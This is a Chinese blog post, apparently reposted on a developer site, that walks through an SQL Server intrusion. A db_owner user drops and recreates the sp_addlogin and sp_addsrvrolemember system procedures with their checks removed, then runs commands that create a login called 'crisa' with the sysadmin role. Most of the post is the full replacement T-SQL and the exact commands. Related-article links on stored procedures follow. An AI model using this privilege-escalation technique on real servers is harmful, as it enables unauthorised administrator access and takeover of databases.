Extended Stored Proc & Inject

最新推荐文章于 2018-06-12 09:04:16 发布
最新推荐文章于 2018-06-12 09:04:16 发布
阅读量107 收藏
点赞数
文章标签: IE SQL Server SQL Go Access

前面刚谈完why to take some steps to do with extended stored procedures?
how to remove and / or restore scripts,这边问题又来了,又一例利用Extended Stored Proc进行入侵开始了

入侵途径:利用db_owner在db_owner角色下添加SYSADMIN帐号可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程,绕过验证部分。

具体方法如下:先输入drop procedure sp_addlogin,然后在IE里面输入create procedure sp_addlogin

  @loginame sysname

  ,@passwd sysname = Null

  ,@defdb ; ; sysname = 'master' -- UNDONE: DEFAULT

  CONFIGURABLE

  ,@deflanguage sysname = Null

  ,@sid varbinary(16) = Null

  ,@encryptopt varchar(20) = Null

  AS

  -- SETUP RUNTIMEOPTIONS / DECLARE VARIABLES --

  set nocount on

  Declare @ret int -- return value of sp call

  -- DISALLOW USER TRANSACTION --

  set implicit_transactions off

  IF (@@trancount > 0)

  begin

  raiserror(15002,-1,-1,'sp_addlogin')

  return (1)

  end

  -- VALIDATE LOGIN NAME AS:

  -- (1) Valid SQL Name (SQL LOGIN)

  -- (2) No backslash (NT users only)

  -- (3) Not a reserved login name

  execute @ret = sp_validname @loginame

  if (@ret <> 0)

  return (1)

  if (charindex('\', @loginame) > 0)

  begin

  raiserror(15006,-1,-1,@loginame)

  return (1)

  end

  --Note: different case sa is allowed.

  if (@loginame = 'sa' or lower(@loginame) in ('public'))

  begin

  raiserror(15405, -1 ,-1, @loginame)

  return (1)

  end

  -- LOGIN NAME MUST NOT ALREADY EXIST --

  if exists(select * from master.dbo.syslogins where loginname =

  @loginame)

  begin

  raiserror(15025,-1,-1,@loginame)

  return (1)

  end

  -- VALIDATE DEFAULT DATABASE --

  IF db_id(@defdb) IS NULL

  begin

  raiserror(15010,-1,-1,@defdb)

  return (1)

  end

  -- VALIDATE DEFAULT LANGUAGE --

  IF (@deflanguage IS NOT Null)

  begin

  Execute @ret = sp_validlang @deflanguage

  IF (@ret <> 0)

  return (1)

  end

  ELSE

  begin

  select @deflanguage = name from master.dbo.syslanguages

  where langid = @@default_langid --server default

  language

  if @deflanguage is null

  select @deflanguage = N'us_english'

  end

  -- VALIDATE SID IF GIVEN --

  if ((@sid IS NOT Null) and (datalength(@sid) <> 16))

  begin

  raiserror(15419,-1,-1)

  return (1)

  end

  else if @sid is null

  select @sid = newid()

  if (suser_sname(@sid) IS NOT Null)

  begin

  raiserror(15433,-1,-1)

  return (1)

  end

  -- VALIDATE AND USE ENCRYPTION OPTION --

  declare @xstatus smallint

  select @xstatus = 2 -- access

  if @encryptopt is null

  select @passwd = pwdencrypt(@passwd)

  else if @encryptopt = 'skip_encryption_old'

  begin

  select @xstatus = @xstatus | 0x800, -- old-style

  encryption

  @passwd = convert(sysname, convert(varbinary

  (30), convert(varchar(30), @passwd)))

  end

  else if @encryptopt <> 'skip_encryption'

  begin

  raiserror(15600,-1,-1,'sp_addlogin')

  return 1

  end

  -- ATTEMPT THE INSERT OF THE NEW LOGIN --

  INSERT INTO master.dbo.sysxlogins VALUES

  (NULL, @sid, @xstatus, getdate(),

  getdate(), @loginame, convert(varbinary(256), @passwd),

  db_id(@defdb), @deflanguage)

  if @@error <> 0 -- this indicates we saw duplicate row

  return (1)

  -- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE

  SYSLOGINS CHANGE --

  exec('use master grant all to null')

  -- FINALIZATION: RETURN SUCCESS/FAILURE --

  raiserror(15298,-1,-1)

  return (0) -- sp_addlogin

  GO

  OK,我们新建个用户exec master..sp_addlogin crisa

  再drop procedure sp_addsrvrolemember,然后在IE里输入

  create procedure sp_addsrvrolemember

  @loginame sysname, -- login name

  @rolename sysname = NULL -- server role name

  as

  -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --

  set nocount on

  declare @ret int, -- return value of sp call

  @rolebit smallint,

  @ismem int

  -- DISALLOW USER TRANSACTION --

  set implicit_transactions off

  IF (@@trancount > 0)

  begin

  raiserror(15002,-1,-1,'sp_addsrvrolemember')

  return (1)

  end

  -- CANNOT CHANGE SA ROLES --

  if @loginame = 'sa'

  begin

  raiserror(15405, -1 ,-1, @loginame)

  return (1)

  end

  -- OBTAIN THE BIT FOR THIS ROLE --

  select @rolebit = CASE @rolename

  WHEN 'sysadmin' THEN 16

  WHEN 'securityadmin' THEN 32

  WHEN 'serveradmin' THEN 64

  WHEN 'setupadmin' THEN 128

  WHEN 'processadmin' THEN 256

  WHEN 'diskadmin' THEN 512

  WHEN 'dbcreator' THEN 1024

  WHEN 'bulkadmin' THEN 4096

  ELSE NULL END

  -- ADD ROW FOR NT LOGIN IF NEEDED --

  if not exists(select * from master.dbo.syslogins where

  loginname = @loginame)

  begin

  execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame

  if (@ret <> 0)

  begin

  raiserror(15007,-1,-1,@loginame)

  return (1)

  end

  end

  -- UPDATE ROLE MEMBERSHIP --

  update master.dbo.sysxlogins set xstatus = xstatus | @rolebit,

  xdate2 = getdate()

  where name = @loginame and srvid IS NULL

  -- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE

  SYSLOGINS CHANGE --

  exec('use master grant all to null')

  raiserror(15488,-1,-1,@loginame,@rolename)

  -- FINALIZATION: RETURN SUCCESS/FAILURE

  return (@@error) -- sp_addsrvrolemember

  GO

  接着再exec master..sp_addsrvrolemember crisa,sysadmin

  这样就建立了一个SA用户了,用SQL连接器连接上就OK了。

iteye_20954
关注
HIVE STORED&Row format(四)
anti
12-22 2万+
HIVE STORED&amp;amp;Row format hive表数据在存储在文件系统上的,因此需要有文件存储格式来规范化数据的存储,一边hive写数据或者读数据。hive有一些已构建好的存储格式,也支持用户自定义文件存储格式。主要由两部分内容构成file_format和row_format,两者息息相关,在create table语句中结构如下: [ROW FORMAT row_format]...
某公司笔试题
heiyeluren的blog(黑夜路人的开源世界)
11-06 3474
某公司笔试题1. 两个表,都1000W的数据,left join会不会挂? 如果数据量再大,怎么优化? 2. 一个数据文件,每条记录内容包括:时间、IP地址、关键词。记录是无序排列的,条数超过2000万条。 要求是按检索词排序,并保持时间,IP地址和关键词保持原来的关联... 设计一个程序实现这个功能,并分析时间复杂度和空间复杂度...硬盘足够大..内存1G  (题目不是俺做滴,是一个
存储过程(Stored Procedure)
01-17 755
存储过程(Stored Procedure)是在大型数据库系统中,一组为了完成特定功能的SQL 语句集,经编译后存储在数据库中,用户通过指定存储过程的名字并给出参数(如果该存储过程带有参数)来执行它。           存储过程在运算时生成执行方式,所以,以后对其再运行时其执行速度很快。 优点: 1.存储过程只在创造时进行编译,以后每次执行存储过程都不需再重新编译,而一般SQL语句每执行一
存储过程(Stored Procedure)及应用
weixin_30621919的博客
11-08 55
一、TRUNCATE二、Select INTO 建表把一个表中的数据复制到另外一个表中。三、Insert INTO Select四、补充:临时表临时表存储在系统数据库tempdb中临时表会被系统隐式地丢弃---------------------------------------------------------五、存储过程(**)一、简介: ...
Extended Stored Proc & Inject 
软件开发资料汇总
04-01 209
某公司笔试题1. 两个表,都1000W的数据,left join会不会挂? 如果数据量再大,怎么优化? 2. 一个数据文件,每条记录内容包括:时间、IP地址、关键词。记录是无序排列的,条数超过2000万条。 要求是按检索词排序,并保持时间,IP地址和关键词保持原来的关联... 设计一个程序实现这个功能,并分析时间复杂度和空间复杂度...硬盘足够大..内存1G  (题目不是俺做滴,是一个PHPC
Convert MSSQL Tables/Stored Proc to WSDL-开源
06-08
标题中的“Convert MSSQL Tables/Stored Proc to WSDL”指的是一个开源项目,它允许开发者将Microsoft SQL Server中的表格和存储过程转换为WSDL(Web Services Description Language)文件。WSDL是一种XML格式,用于...
Bank:数据库管理员的银行账户项目 [C#、MS SQLstoredproc]
06-17
这个系统显然基于C#编程语言,利用Microsoft SQL Server (MS SQL)作为数据库管理系统,并且在数据库操作中使用了存储过程(storedproc)。以下是该项目涉及的关键知识点: 1. **C#编程**: C#是微软开发的一种面向对象...
CTN Hashing Extended Stored Procedure-开源
05-29
CTNHashProc 是一个 Microsoft SQLServer 2000 扩展存储过程,它返回给定字符串的哈希值。 目前支持的哈希函数有 SHA (SHA1)、SHA2 (SHA-256、SHA-384、SHA-512)、MD5、RIPEMD-160、Tiger。
第四节 存储过程(stored procedures)2---马克-to-win java视频
06-11
第四节 存储过程(stored procedures)2---马克-to-win java视频
Stored Procedure存储过程基础知识详解
独家记忆-涂仕明的专栏
05-19 8147
存储过程是做项目的必备技术,只要你面试找工作,数据库及存储过程也是必考的,下面一起来了解存储过程的简单基本技术知识: 一、存储过程基本概念? 存储过程就是作为可执行对象存放在数据库中的一个或多个SQL命令。通俗来讲:存储过程其实就是能完成一定操作的一组SQL语句,它是由一些T-SQL语句组成的代码块,这些T-SQL语句代码像一个方法一样实现一些功能(对单表或多表的增删改查),然后再给这个代码块
SQLSERVER中使用存储过程(Stored Procedure)
clh9225122的博客
02-09 391
随着SQLSERVER不断的学习,认识的深入,我们会发现越来越多的功能呈现在我们面前,这些功能都是十分强大的,在我们应用中发挥着十分有意义的作用,也因此感知作为一个大型的数据库管理系统的魅力所在。从这一篇开始,我们着手讨论“存储...
SQLStoredProc调用数据库存储过程
weixin_34040079的博客
03-06 323
delphi 中用SQLStoredProc控件可调用数据存储过程。 下图为oracle 11g中写的存储过程IN表示输入参数,OUT表示输出参数,也可能用IN OUT表出输入输出参数。这里存储过程名为TESTPROC,功能:根据输入的param1值把EMP表中该条记录ENAME字段的值修改为param2。 下图为效果图: ******************************...
存储过程(Stored Procedure)介绍
热门推荐
liitdar的博客
06-12 1万+
存储过程是大型数据库系统中,一组为了完成特定功能的SQL语句集,这些SQL语句集存储在数据库中,经过第一次编译后,后续调用不需要再次编译,用户通过存储过程的名字并给出参数(如果该存储过程带有参数)来执行它。存储过程是数据库的一个重要对象。
根据这些数据创建存储过程P_stored_proc,指定供应商代码,查询该供应商的订单信息;
最新发布
06-07
根据提供的数据,可以创建一个名为P_stored_proc的存储过程,可以按照以下的SQL语句创建: ``` CREATE PROCEDURE P_stored_proc (IN supp_code VARCHAR(10)) BEGIN SELECT T_orders.order_id, T_goods.goods_id, T...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值